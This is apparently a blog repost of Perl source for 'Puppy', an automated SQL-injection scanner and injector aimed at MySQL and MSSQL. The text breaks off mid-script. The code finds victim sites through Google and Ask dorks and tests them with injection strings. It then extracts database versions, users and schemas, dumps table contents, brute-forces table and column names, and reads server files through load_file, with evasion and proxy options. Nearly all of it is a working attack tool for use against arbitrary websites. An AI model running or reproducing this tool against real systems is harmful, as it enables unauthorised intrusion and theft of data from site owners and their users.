MySQL/MSSQL 扫描注入工具puppy源码

最新推荐文章于 2022-02-07 21:07:09 发布
最新推荐文章于 2022-02-07 21:07:09 发布
阅读量1.7k 收藏
点赞数
分类专栏: ruby/perl

MySQL/MSSQL Scanner & Injector 源码

http://code.google.com/p/puppy-pl/

#!/usr/bin/perl


use LWP::UserAgent;
use HTTP::Request;

sub help
{
     system('cls');
     system('title Puppy AutoSQL injector');
     print "-----------------------------------\n";
     print "[!] Usage : $0 <option>\n";
     print "[!] Example : $0 --evasion %20 http://site.org/?id=999 --output out.txt\n";
     print "[!] Dork Ex : $0 --dork inurl:news.php?id= intitle:target\n";
     print "\n--|| MySQL\n\n";
     print "     --mysqlcol         MySQL column length calculator            MySQL v4/5\n";
     print "     --mysqldetails     MySQL target website db global infos      MySQL v4/5\n";
     print "     --mysqlschema      MySQL Full Schema Extractor               MySQL v5\n";
     print "     --mysqldump        MySQL Data Dump                           MySQL v4/5\n";
     print "     --mysqlfile        MySQL load_file fuzzer                    MySQL v4/5\n";
     print "     --mysqltblfuzz     MySQL Table_name Fuzzer                   MySQL v4\n";
     print "     --mysqlcolfuzz     MySQL Column_name Fuzzer                  MySQL v4\n";
     print "-----------------------------------\n";
     print "\n--|| MsSQL\n\n";
     print "     --mssqldetails      MsSQL DB global info\n";
     print "     --mssqltable        MsSQL Tables Extractor\n";
     print "     --mssqlcolumns      MsSQL Columns Extractor\n";
     print "     --mssqldump         MsSQL Columns Extractor\n";
     print "-----------------------------------\n";
     print "\n--|| Vulnerability Scanner\n\n";
     print "     --dork              URL Extractor , SQL Vulnerability's Scanner & Checker\n";
     print "-----------------------------------\n";
     print "\n--|| Options\n\n";
     print "     --proxy             define a proxy to use\n";
     print "     --listfile          list of columns or tables to use in fuzz or load_file files list\n";
     print "     --output            save injection or scan result in an outside file\n";
     print "     --table             table to use in dumping data or in tbles extract\n";
     print "     --column            column to use in dumping data or in column extract\n";
     print "     --evasion           Evasive string such as \"%20\" \"/*\" \"+\" (do not include quotes)\n";
     print "     --help              print this help manual\n\n";
     print "     --|| As usual, play safe and stay wisdom. Wish you have a happy hacker life! :] ||--\n";
     print "-----------------------------------\n";
     exit();
}

sub variables
{
     my $i=0;
     foreach (@ARGV)
     {
         if ($ARGV[$i] eq "--dork"){$search_dork = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mysqlcol"){$mysql_count_target = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mysqldetails"){$mysql_details_target = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mysqlschema"){$mysql_schema_target = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mysqldump"){$mysql_dump_target = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mysqltblfuzz"){$mysql_fuzz_table = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mysqlcolfuzz"){$mysql_fuzz_column = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mysqlfile"){$mysql_load_file = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mssqldetails"){$mssql_details_target = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mssqltable"){$mssql_table_target = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mssqlcolumn"){$mssql_column_target = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mssqldump"){$mssql_dump_target = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--column"){$sql_dump_column = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--table"){$sql_dump_table = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--evasion"){$evasion = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--output"){$vulnfile = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--proxy"){$proxy = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--listfile"){$word_list = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--help"){&help}
         $i++;
     }
}



sub main
{
     system('cls');
     system('title AutoSQL Injector');
     print " \n######################################\n";
     print " \n       Puppy - AutoSQL Injector";
     print " \n               by m0le";
     print " \n        digiopen55\@gmail.com\n";
     print " \n######################################\n\n";
     if (@ARGV<1){print "[?] For Help : $0 --help\n\n" ;}
}

sub vulnscanner
{
     checkgoogle();
     googlescan($search_dork);
     askscan($search_dork);
}

sub checkgoogle
{
     my $request   = HTTP::Request->new(GET => "http://www.google.com/search?hl=en&q=$search_dork&btnG=Search&start=10");
     my $useragent = LWP::UserAgent->new(agent => 'FAST-WebCrawler/3.3');
     $useragent->proxy("http", "http://$proxy/") if defined($proxy);
     my $response  = $useragent->request($request) ;
     my $result    = $response->content;
     if ($result   =~ m/if you suspect that your computer or network has been infected/i){print "[!] You Have Been Banned From Google Search :( \n";exit()}
}         

sub googlescan
{
     my $dork  = $_[0];
     for ($i=0;$i<200;$i=$i+10)
     {
         my $request   = HTTP::Request->new(GET => "http://www.google.com/search?hl=en&q=$dork&btnG=Search&start=$i");
         my $useragent = LWP::UserAgent->new(agent => 'FAST-WebCrawler/3.3');
         $useragent->proxy("http", "http://$proxy/") if defined($proxy);
         my $response  = $useragent->request($request) ;
         my $result    = $response->content;
         while ($result =~ m/class=r><a href=\"(.*?)\" class=l>/g )
         {
             print "[!] Trying to fuzz $1\n";     
             checkvuln($1)
         }
     }                  
}

sub askscan
{
     my $dork  = $_[0];
     for ($i=0;$i<20;$i++)
     {
         my $request   = HTTP::Request->new(GET => "http://www.ask.com/web?q=page.php?id=&qsrc=0&o=0&l=dir&q=$dork&page=$i&jss=");
         my $useragent = LWP::UserAgent->new(agent => 'FAST-WebCrawler/3.3');
         $useragent->proxy("http", "http://$proxy/") if defined($proxy);
         my $response  = $useragent->request($request) ;
         my $result    = $response->content;
         while ($result =~ m/<span id=\"r(.*)_u\" class=\"(.*)\">(.*)<\/span>/gi)
         {
             my $askurl ="http://".$3 ;
             print "[!] Trying to fuzz $askurl\n";
             checkvuln($askurl);
         }
     }
}

sub checkvuln
{
     my $scan_url   = $_[0];
     my $link       = $scan_url.'0+order+by+9999999--';
     my $ua         = LWP::UserAgent->new();
     $ua->proxy("http", "http://$proxy/") if defined($proxy);
     my $req        = $ua->get($link);
     my $fuzz       = $req->content;
     if ($fuzz =~ m/You have an error in your SQL syntax/i || $fuzz =~ m/Query failed/i || $fuzz =~ m/SQL query failed/i || $fuzz =~ m/mysql_fetch_/i || $fuzz =~ m/mysql_fetch_array/i || $fuzz =~ m/mysql_num_rows/i || $fuzz =~ m/The used SELECT statements have a different number of columns/i )
     {
         print "[!] MySQL Vulnerable     -> $scan_url\n";
         if (defined($vulnfile))
         { 
             push (@mysqlvuln,"$scan_url\n");
         }
     }
     elsif ($fuzz =~ m/ODBC SQL Server Driver/i)
     {
         print "[!] MsSQL Vulnerable     -> $scan_url\n";
         if (defined($vulnfile))
         { 
             push (@mssqlvuln,"$scan_url\n");
         }
     }
     elsif ($fuzz =~ m/Microsoft JET Database/i || $fuzz =~ m/ODBC Microsoft Access Driver/i )
     {
         print "[!] MS Access Vulnerable -> $scan_url\n";
         if (defined($vulnfile))
         { 
             push (@accessvuln,"$scan_url\n");
         }
     }
}

sub mysqlcount
{
     my $site   = $_[0];
     my $ev     = $_[1];
     my $null   = "09'+and+1=" ;
     my $code   = "0+union+select+" ;
     if ($ev eq '/*') 
     {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
     {$add = "%20" ; $com = "%00" ;}
     else 
     {$add = '+' ; $com ='--';}
     my $injection = $site.$null.$code."0",$com ;
     my $useragent = LWP::UserAgent->new();
     $useragent->proxy("http", "http://$proxy/") if defined($proxy);
     my $response  = $useragent->get($injection);
     my $result   = $response->content;
     if( $result =~ m/You have an error in your SQL syntax/i || $result =~ m/Query failed/i || $result =~ m/supplied argument is not a valid MySQL/i || $result =~ m/SQL query failed/i || $result =~ m/mysql_fetch_/i || $result =~ m/mysql_fetch_array/i || $result =~ m/mysql_num_rows/i || $result =~ m/The used SELECT statements have a different number of columns/i )
     {
          print "\n[!] This Website Is Vulnerable\n" ;
          print "[+] Working On It\n";
     }
     else
     {
         print "\n[!] This WebSite Is Not SQL Vulnerable !\n";
         exit();
     }
     for ($i = 0 ; $i < 100 ; $i ++)
     {
         $col.=','.$i;
         $specialword.=','."0x617a38387069783030713938";
         if ($i == 0)
         {
             $specialword = '' ; 
             $col = '' ;
         }
         $sql=$site.$null.$code."0x617a38387069783030713938".$specialword.$com ;
         $ua = LWP::UserAgent->new();
         $ua->proxy("http", "http://$proxy/") if defined($proxy);
         $rq = $ua->get($sql);
         $response = $rq->content;
         if($response =~ /az88pix00q98/)
         {
             $i ++;             
             print "\n[!] MySQL Column Count Finished\n" ;
             print "[!] This WebSite Have $i Columns\n" ;
             $sql=$site.$null.$code."0".$col.$com ;
             print "=> ".$sql ."\n\n";    
             if (defined($vulnfile))
             {
                 open(vuln_file,">>$vulnfile") ;
                 print vuln_file "Target Host : $site\n";
                 print vuln_file "Evasion     : $ev\n";
                 print vuln_file "Col length  : $i\n";
                 print vuln_file "Injection   : $sql\n";
                 close(vuln_file);
                 print "[+] Result Saved to $vulnfile\n";
             }
             exit () ;         
         }    
     }
}

sub mysqldetails
{
     my $site   = $_[0];
     my $ev     = $_[1];
     if ($ev eq '/*') 
     {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
     {$add = "%20" ; $com = "%00" ;}
     else 
     {$add = '+' ; $com ='--';}
     my $selection = "concat(0x617a38387069783030713938,version(),0x617a38387069783030713938,database(),0x617a38387069783030713938,user(),0x617a38387069783030713938)";
     print "\n[+] Info Getting, Started Please Wait ....\n\n";
     if ($site =~ /(.*)NullArea(.*)/i)
     {
         my $newlink = $1.$selection.$2.$com;
         my $ua = LWP::UserAgent->new();
         $ua->proxy("http", "http://$proxy/") if defined($proxy);
         my $request = $ua->get($newlink);
         my $content = $request->content;
         if ($content =~ /az88pix00q98(.*)az88pix00q98(.*)az88pix00q98(.*)az88pix00q98/)
         {
             print "[!] Database Version  : $1\n";
             print "[!] Database Name     : $2\n";                          
             print "[!] DB UserName       : $3\n";                          
             if (defined($vulnfile))
             {
                 open(vuln_file,">>$vulnfile") ;
                 print vuln_file "[!] Target            : $site\n";
                 print vuln_file "[!] evasion           : $ev\n";
                 print vuln_file "[!] Database Version  : $1\n";
                 print vuln_file "[!] Database Name     : $2\n";
                 print vuln_file "[!] DB UserName       : $3\n";
                 close(vuln_file);
                 print "\n[+] Result Saved to $vulnfile\n";
             }
             exit () ;             
         }
         else
         {
             print "[!] Failed\n";
             exit () ;    
         }
     }
     else 
     {
         print "[+] Please Enter the target this way :\n http://target.net/page.php?id=0+union+select+1,2,nullarea,3\n";
         exit () ;             
     }
}

sub mysqlschema
{
     my $site   = $_[0];
     my $ev     = $_[1];
     my @schema=();
     if ($ev eq '/*') 
     {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
     {$add = "%20" ; $com = "%00" ;}
     else 
     {$add = '+' ; $com ='--';}
     my $selection = "concat(0x617a38387069783030713938,column_name,0x617a38387069783030713938,table_name,0x617a38387069783030713938,table_schema,0x617a38387069783030713938)";
     print "\n[+] Schema Extracting, Started Please Wait ....\n\n";
     if ($site =~ /(.*)NullArea(.*)/i)
     {
         print "[+] Column :|: Table :|: Database\n"; 
         for ($i=0;  $i<=1000 ; $i++ )
         {
             $newstring = $1.$selection.$2.$add.'from'.$add.'information_schema.columns'.$add.'LIMIT'.$add.$i.','.'1'.$com;
             my $ua = LWP::UserAgent->new();
             $ua->proxy("http", "http://$proxy/") if defined($proxy);
             my $request = $ua->get($newstring);
             my $content = $request->content;
             if ($content =~ /az88pix00q98(.*)az88pix00q98(.*)az88pix00q98(.*)az88pix00q98/)
             { 
                 print "[!] $1 :|: $2 :|: $3 \n";
                 push (@schema,"$1 :|: $2 :|: $3 \n");
             }
         }
         if (defined($vulnfile))
         {
             open(vuln_file,">>$vulnfile") ;
             print vuln_file "[!] Target            : $site\n";
             print vuln_file "[!] evasion           : $ev\n";
             print vuln_file "[!] Schema  :: ----     \n\n\n";
             $i=0;
             foreach(@schema)
             {
                 print vuln_file $schema[$i]."\n";
                 $i++;
             }
             print "\n[+] Result Saved to $vulnfile\n";
         }
     }
     else 
     {
         print "[+] Please Enter the target this way :\n http://target.net/page.php?id=0+union+select+1,2,nullarea,3\n";
         exit () ;             
     }
}

sub mysqldump
{
     my $site   = $_[0];
     my $colm   = $_[1];
     my $tble   = $_[2];
     my $ev     = $_[3];
     print "[+] Table name $tble\n";
     print "[+] Column name $colm\n";
     my @dumper=();
     if ($ev eq '/*') 
     {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
     {$add = "%20" ; $com = "%00" ;}
     else 
     {$add = '+' ; $com ='--';}
     my $selection = "concat(0x617a38387069783030713938,$colm,0x617a38387069783030713938)";
     print "\n[+] Data Dump Started Please Wait ....\n\n";
     if ($site =~ /(.*)NullArea(.*)/i)
     {
         $i=0;
         print "[+] Dumped Data :  \n"; 
         do
         {
             $newstring = $1.$selection.$2.$add.'from'.$add.$tble.$add.'LIMIT'.$add.$i.','.'1'.$com;             
             my $ua = LWP::UserAgent->new();
             $ua->proxy("http", "http://$proxy/") if defined($proxy);
             my $request = $ua->get($newstring);
             my $content = $request->content;
             if ($content =~ /az88pix00q98(.*)az88pix00q98/)
             { 
                 print "[!] $1 \n";
                 push(@dumper,"$1\n");
             }
             $i++;
         }
         while ($i<1500);
         if (defined($vulnfile))
         {
             open(vuln_file,">>$vulnfile") ;
             print vuln_file "[!] Target            : $site\n";
             print vuln_file "[!] evasion           : $ev\n";
             print vuln_file "[!] Dumped Column     : $colm\n";
             print vuln_file "[!] Dumped Table      : $tble\n";
             print vuln_file "[!] Data  :: ----     \n\n\n";
             $i=0;
             foreach(@dumper)
             {
                 print vuln_file $dumper[$i]."\n";
                 $i++;
             }
             close(vuln_file);
             print "\n[+] Result Saved to $vulnfile\n";
         }
     }
     else 
     {
         print "[+] Please Enter the target this way :\n http://target.net/page.php?id=0+union+select+1,2,nullarea,3\n";
         exit () ;             
     }
}

sub mysqlfuzztable
{
     my $site    = $_[0];
     my $ev      = $_[1];
     my $filelst = $_[2];
     print "[+] File List $filelst\n";
     my @tbles_possible=();
     if ($ev eq '/*') 
     {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
     {$add = "%20" ; $com = "%00" ;}
     else 
     {$add = '+' ; $com ='--';}
     open (word_list_file,"$filelst") or die "[!] Couldnt Open WordList File $!\n";
     @word_list_search = <word_list_file> ;
     print "\n[+] Fuzzing Table, Started Please Wait ....\n\n";
     if ($site =~ /(.*)NullArea(.*)/i)
     {
         print "[+] Fuzz Result :  \n\n";
         $i=0;         
         foreach (@word_list_search)
         {
             print "[!] Trying To Fuzz Table_name with $word_list_search[$i]";
             $newstring = $1."0x617a38387069783030713938".$2.$add.'from'.$add.$word_list_search[$i].$com;                 
             my $ua = LWP::UserAgent->new();
             $ua->proxy("http", "http://$proxy/") if defined($proxy);
             my $request = $ua->get($newstring);
             my $content = $request->content;
             if ($content =~ /az88pix00q98/)
             { 
                 print "\n[!] Found Table ! $word_list_search[$i] \n";
                 push(@tbles_possible,"$word_list_search[$i]\n");
             }
             $i++;
         }
         if (defined($vulnfile))
         {
             open(vuln_file,">>$vulnfile") ;
             print vuln_file "[!] Target            : $site\n";
             print vuln_file "[!] evasion           : $ev\n";
             print vuln_file "[!] Wordlist          : $filelst\n";
             print vuln_file "[!] Tbles Found  :: ----     \n\n\n";
             $i=0;
             foreach(@tbles_possible)
             {
                 print vuln_file $tbles_possible[$i]."\n";
                 $i++;
             }
             close(vuln_file);
             print "\n[+] Result Saved to $vulnfile\n";
         }
     }
     else 
     {
         print "[+] Please Enter the target this way :\n http://target.net/page.php?id=0+union+select+1,2,nullarea,3\n";
         exit () ;             
     }
}

sub mysqlfuzzcolumn
{
     my $site    = $_[0];
     my $ev      = $_[1];
     my $filelst = $_[2];
     my $tablext = $_[3];
     print "[+] File List $filelst\n";
     print "[+] Table To Fuzz Columns $tablext\n";
     my @cols_possible=();
     if ($ev eq '/*') 
     {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
     {$add = "%20" ; $com = "%00" ;}
     else 
     {$add = '+' ; $com ='--';}
     open (word_list_file,"$filelst") or die "[!] Couldnt Open WordList File $!\n";
     @word_list_search = <word_list_file> ;
     print "\n[+] Fuzzing Column, Started Please Wait ....\n\n";
     if ($site =~ /(.*)NullArea(.*)/i)
     {
         print "[+] Fuzz Result :  \n\n";
         $i=0;         
         foreach (@word_list_search)
         {
             print "[!] Trying To Fuzz Column_name with $word_list_search[$i]";
             $newstring = $1."concat(0x617a38387069783030713938,$word_list_search[$i])".$2.$add.'from'.$add.$tablext.$com;                 
             my $ua = LWP::UserAgent->new();
             $ua->proxy("http", "http://$proxy/") if defined($proxy);
             my $request = $ua->get($newstring);
             my $content = $request->content;
             if ($content =~ /az88pix00q98/)
             { 
                 print "\n[!] File Column ! $word_list_search[$i] \n";
                 push(@cols_possible,"$word_list_search[$i]\n");
             }
             $i++;
         }
         if (defined($vulnfile))
         {
             open(vuln_file,">>$vulnfile") ;
             print vuln_file "[!] Target            : $site\n";
             print vuln_file "[!] evasion           : $ev\n";
             print vuln_file "[!] Wordlist          : $filelst\n";
             print vuln_file "[!] Cols Found  :: ----     \n\n\n";
             $i=0;
             foreach(@cols_possible)
             {
                 print vuln_file $cols_possible[$i]."\n";
                 $i++;
             }
             close(vuln_file);
             print "\n[+] Result Saved to $vulnfile\n";
         }
     }
     else 
     {
         print "[+] Please Enter the target this way :\n http://target.net/page.php?id=0+union+select+1,2,nullarea,3\n";
         exit () ;             
     }
}

sub mysqlfile
{
     my $site    = $_[0];
     my $ev      = $_[1];
     my $filelst = $_[2];
     print "[+] File List $filelst\n";
     my @cols_possible=();
     if ($ev eq '/*') 
     {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
     {$add = "%20" ; $com = "%00" ;}
     else 
     {$add = '+' ; $com ='--';}
     open (word_list_file,"$filelst") or die "[!] Couldnt Open WordList File $!\n";
     @word_list_search = <word_list_file> ;
     print "\n[+] File Fuzz, Started Please Wait ....\n\n";
     if ($site =~ /(.*)NullArea(.*)/i)
     {
         print "[+] Fuzz Result :  \n\n";
         $i=0;         
         foreach (@word_list_search)
         {
             $newstring = $1."concat(0x617a38387069783030713938,load_file('$word_list_search[$i]'))".$2.$com;             
             my $ua = LWP::UserAgent->new();
             $ua->proxy("http", "http://$proxy/") if defined($proxy);
             my $request = $ua->get($newstring);
             my $content = $request->content;
             print "[!] Trying To Fuzz Load_File with $word_list_search[$i]";
             if ($content =~ m/az88pix00q/i)
             { 
                 print "\n[!] Found File ! $word_list_search[$i] \n";
                 push(@cols_possible,"$word_list_search[$i]\n");
             }
             $i++;
         }
         if (defined($vulnfile))
         {
             open(vuln_file,">>$vulnfile") ;
             print vuln_file "[!] Target            : $site\n";
             print vuln_file "[!] evasion           : $ev\n";
             print vuln_file "[!] Wordlist          : $filelst\n";
             print vuln_file "[!] Files Found  :: ----     \n\n\n";
             $i=0;
             foreach(@cols_possible)
             {
                 print vuln_file $cols_possible[$i]."\n";
                 $i++;
             }
             close(vuln_file);
             print "\n[+] Result Saved to $vulnfile\n";
         }
     }
     else 
     {
         print "[+] Please Enter the target this way :\n http://target.net/page.php?id=0+union+select+1,2,nullarea,3\n";
         exit () ;             
     }
}

sub mssqldetails
{
     my $site   = $_[0];
     my $ev     = $_[1];
     if ($ev eq '/*') 
     {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
     {$add = "%20" ; $com = "%00" ;}
     else 
     {$add = '+' ; $com ='--';}
     print "\n[+] Getting Infos, Started Please Wait ....\n\n";
     $version = "convert(int,(select".$add."\@\@version));--" ;
     $system_user = 'convert(int,(select'.$add.'system_user));--';
     $db_name = 'convert(int,(select'.$add.'db_name()));--';
     $servername = 'convert(int,(select'.$add.'@@servername));--' ;
     my $injection = $site.$version ;
     my $request   = HTTP::Request->new(GET=>$injection);
     my $useragent = LWP::UserAgent->new();
     $useragent->timeout(10);
     my $response  = $useragent->request($request)->as_string ;
     if ($response =~ /.*?value\s'/)
     {
         print "[+] This Website Is SQL Vulnerable ..\n";
         print "[+] Working On It ..\n";
         $ver = $1 if ($response =~ /.*?value\s'(.*?)'\sto.*/sm) ;
         print "\n[!] MsSQL Version Is :";
         print "\n\n => $ver"    ;
         my $injection = $site.$system_user ;
         my $request   = HTTP::Request->new(GET=>$injection);
         my $useragent = LWP::UserAgent->new();
         $useragent->timeout(10);
         my $response  = $useragent->request($request)->as_string ;
         $system_user = $1 if ($response =~ /.*value\s'(.*)'\sto.*/);
         print "\n[!] MsSQL System_User Is    :";
         print "  $system_user  "    ;
         my $injection = $site.$db_name ;
         my $request   = HTTP::Request->new(GET=>$injection);
         my $useragent = LWP::UserAgent->new();
         $useragent->timeout(10);
         my $response  = $useragent->request($request)->as_string ;
         $db_name = $1 if ($response =~ /.*value\s'(.*)'\sto.*/);
         print "\n[!] MsSQL Database Name Is  :";
         print "  $db_name  "    ;          
         my $injection = $site.$servername ;
         my $request   = HTTP::Request->new(GET=>$injection);
         my $useragent = LWP::UserAgent->new();
         $useragent->timeout(10);
         my $response  = $useragent->request($request)->as_string ;
         $servername = $1 if ($response =~ /.*value\s'(.*)'\sto.*/);
         print "\n[!] MsSQL Server Name Is    :";
         print "  $servername  "    ;    
         exit ();                       
     }
     else 
     {
         system ("cls");
         print "\n[!] This Website Is Not SQL Vulnerable !";
         exit();
    }
}

sub mssqltable
{
     my $site   = $_[0];
     my $ev     = $_[1];
     if ($ev eq '/*') 
     {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
     {$add = "%20" ; $com = "%00" ;}
     else 
     {$add = '+' ; $com ='--';}
     print "\n[+] Table Extracting, Started Please Wait ....\n\n";
     $table = "convert(int,(select".$add."top".$add."1".$add."table_name".$add."from".$add."information_schema.tables));--";
     $data = "'Ws65qd798sqd9878'";
     print "[!] Tables :  \n\n"; 
     for ($i;$i<1500;$i++)
     {
         my $injection = $site.$table ;
         my $useragent = LWP::UserAgent->new();
         $ua->proxy("http", "http://$proxy/") if defined($proxy);
         my $request   = $useragent->get($injection);
         my $response  = $request->content;
         if ($response =~ /.*?value\s'(.*?)'\sto.*/sm)
         {
             print "[+] ".$1."\n";
             push (@exttbles,$1);
             $start = "(";
             $data .= ",'$1'";
             $end   = ")";
             $total = $start.$data.$end;
             $table = "convert(int,(select".$add."top".$add."1".$add."table_name".$add."from".$add."information_schema.tables".$add."where".$add."table_name".$add."not".$add."in".$add."$total));--";    
         }
     }
     if (defined($vulnfile))
     {
         open(vuln_file,">>$vulnfile") ;
         print vuln_file "[!] Target            : $site\n";
         print vuln_file "[!] evasion           : $ev\n";
         print vuln_file "[!] Data  :: ----     \n\n\n";
         $i=0;
         foreach(@exttbles)
         {
             print vuln_file $exttbles[$i]."\n";
             $i++;
         }
         close(vuln_file);
         print "\n[+] Result Saved to $vulnfile\n";
     }
}

sub mssqlcolumn
{
     my $site   = $_[0];
     my $ev     = $_[1];
     my $tblextrct = $_[2];
     print "[+] Table To Extract From $tblextrct\n";
     if ($ev eq '/*') 
     {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
     {$add = "%20" ; $com = "%00" ;}
     else 
     {$add = '+' ; $com ='--';}
     print "\n[+] Table Extracting, Started Please Wait ....\n\n";
     $data = "'Ws65qd798sqd9878'";
     $table = "convert(int,(select".$add."top".$add."1".$add."column_name".$add."from".$add."information_schema.columns".$add."where".$add."table_name"."="."'$tblextrct'".$add."And".$add."column_name".$add."not".$add."in".$add."($data)"."));--";
     print "[!] Columns :  \n\n"; 
     for ($i;$i<1500;$i++)
     {
         my $injection = $site.$table ;
         my $useragent = LWP::UserAgent->new();
         $ua->proxy("http", "http://$proxy/") if defined($proxy);
         my $request   = $useragent->get($injection);
         my $response  = $request->content;
         if ($response =~ /.*?value\s'(.*?)'\sto.*/sm)
         {
             print "[+] ".$1."\n";
             push (@extcols,$1);
             $start = "(";
             $data .= ",'$1'";
             $end   = ")";
             $total = $start.$data.$end;
             $table = "convert(int,(select".$add."top".$add."1".$add."column_name".$add."from".$add."information_schema.columns".$add."where".$add."table_name"."="."'$tblextrct'".$add."And".$add."column_name".$add."not".$add."in".$add."$total"."));--";    
         }
     }
     if (defined($vulnfile))
     {
         open(vuln_file,">>$vulnfile") ;
         print vuln_file "[!] Target            : $site\n";
         print vuln_file "[!] evasion           : $ev\n";
         print vuln_file "[!] Data  :: ----     \n\n\n";
         $i=0;
         foreach(@extcols)
         {
             print vuln_file $extcols[$i]."\n";
             $i++;
         }
         close(vuln_file);
         print "\n[+] Result Saved to $vulnfile\n";
     }
}

sub mssqldump
{
     my $site   = $_[0];
     my $ev     = $_[1];
     my $tblextrct = $_[2];
     my $colmextrct = $_[3];
     print "[+] Table  : $tblextrct\n";
     print "[+] Column : $colmextrct\n";
     if ($ev eq '/*') 
     {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
     {$add = "%20" ; $com = "%00" ;}
     else 
     {$add = '+' ; $com ='--';}
     print "\n[+] Table Extracting, Started Please Wait ....\n\n";
     $data = "'Ws65qd798sqd9878'";
     $table = "convert(int,(select".$add."top".$add."1".$add."$colmextrct".$add."from".$add."$tblextrct".$add."where".$add."$colmextrct".$add."not".$add."in".$add."($data)"."));--";
     print "[!] Columns :  \n\n"; 
     for ($i;$i<1500;$i++)
     {
         my $injection = $site.$table ;
         my $useragent = LWP::UserAgent->new();
         $ua->proxy("http", "http://$proxy/") if defined($proxy);
         my $request   = $useragent->get($injection);
         my $response  = $request->content;
         if ($response =~ /.*?value\s'(.*?)'\sto.*/sm)
         {
             print "[+] ".$1."\n";
             push (@dumpdata,$1);
             $start = "(";
             $data .= ",'$1'";
             $end   = ")";
             $total = $start.$data.$end;
             $table = "convert(int,(select".$add."top".$add."1".$add."$colmextrct".$add."from".$add."$tblextrct".$add."where".$add."$colmextrct".$add."not".$add."in".$add."$total"."));--";
         }
     }
     if (defined($vulnfile))
     {
         open(vuln_file,">>$vulnfile") ;
         print vuln_file "[!] Target            : $site\n";
         print vuln_file "[!] evasion           : $ev\n";
         print vuln_file "[!] Data  :: ----     \n\n\n";
         $i=0;
         foreach(@dumpdata)
         {
             print vuln_file $dumpdata[$i]."\n";
             $i++;
         }
         close(vuln_file);
         print "\n[+] Result Saved to $vulnfile\n";
     }
}

variables();
main();

if (defined($search_dork))
{
     print "[+] Vulnerability Scan\n" ;
     print "[+] Dork : $search_dork\n\n\n" ;
     vulnscanner();
     if (defined($vulnfile))
     {
         open(vuln_file,">>$vulnfile") ;
         print vuln_file @mysqlvuln;
         print vuln_file @mssqlvuln;
         print vuln_file @accessvuln;
         close(vuln_file);
         print "[+] Result Saved to $vulnfile\n";
         exit();
     }
} 

if (defined($mysql_count_target))
{
     print "[+] MySQL Column Counter\n\n" ;
     print "[+] Target : $mysql_count_target\n" ;
     if ($evasion eq '/*')
     {
         print "[+] Evasion : /**/\n" ;
     }
     elsif ($evasion eq '%20')
     {
         print "[+] Evasion : %20\n" ;
     }
     else
     {
         print "[+] Evasion : --\n" ;
         $evasion = "--"
     }
     mysqlcount($mysql_count_target,$evasion);
}

if (defined($mysql_details_target))
{
     print "[+] MySQL database details\n\n" ;
     print "[+] Target : $mysql_details_target\n" ;
     if ($evasion eq '/*')
     {
         print "[+] Evasion : /**/\n" ;
     }
     elsif ($evasion eq '%20')
     {
         print "[+] Evasion : %20\n" ;
     }
     else
     {
         print "[+] Evasion : --\n" ;
         $evasion = "--"
     }
     mysqldetails($mysql_details_target,$evasion);
}

if (defined($mysql_schema_target))
{
     print "[+] MySQL Schema Extractor details\n\n" ;
     print "[+] Target : $mysql_schema_target\n" ;
     if ($evasion eq '/*')
     {
         print "[+] Evasion : /**/\n" ;
     }
     elsif ($evasion eq '%20')
     {
         print "[+] Evasion : %20\n" ;
     }
     else
     {
         print "[+] Evasion : --\n" ;
         $evasion = "--"
     }
     mysqlschema($mysql_schema_target,$evasion);
}

if (defined($mysql_dump_target))
{
     if (!defined($sql_dump_column))
     {
         print "[!] Please Defind At Least A Column\n";
         exit();
     }
     elsif (!defined($sql_dump_table))
     {
         print "[!] Please Defind Table Name\n";
         exit();
     }
     else
     {
         print "[+] MySQL Data Dumper details\n\n" ;
         print "[+] Target : $mysql_dump_target\n" ;
         if ($evasion eq '/*')
         {
             print "[+] Evasion : /**/\n" ;
         }
         elsif ($evasion eq '%20')
         {
             print "[+] Evasion : %20\n" ;
         }
         else
         {
             print "[+] Evasion : --\n" ;
             $evasion = "--"
         }
         mysqldump($mysql_dump_target,$sql_dump_column,$sql_dump_table,$evasion);
     }     
}

if (defined($mysql_fuzz_table))
{
     if(!defined($word_list))
     {
         print "[!] Please Define A list of tables to load\n";
         exit();
     }     
     else
     {
         print "[+] MySQL Tables Fuzzer\n\n" ;
         print "[+] Target : $mysql_fuzz_table\n" ;
         if ($evasion eq '/*')
         {
             print "[+] Evasion : /**/\n" ;
         }
         elsif ($evasion eq '%20')
         {
             print "[+] Evasion : %20\n" ;
         } 
         else
         {
             print "[+] Evasion : --\n" ;
             $evasion = "--"
         }
         mysqlfuzztable($mysql_fuzz_table,$evasion,$word_list);     
     }
}

if (defined($mysql_fuzz_column))
{
     if(!defined($word_list))
     {
         print "[!] Please Define A list of tables to load\n";
         exit();
     }     
     elsif(!defined($sql_dump_table))
     {
         print "[!] Please Define A Table To Fuzz it's Columns\n";
         exit();
     }    
     else
     {
         print "[+] MySQL Columns Fuzzer\n\n" ;
         print "[+] Target : $mysql_fuzz_column\n" ;
         if ($evasion eq '/*')
         {
             print "[+] Evasion : /**/\n" ;
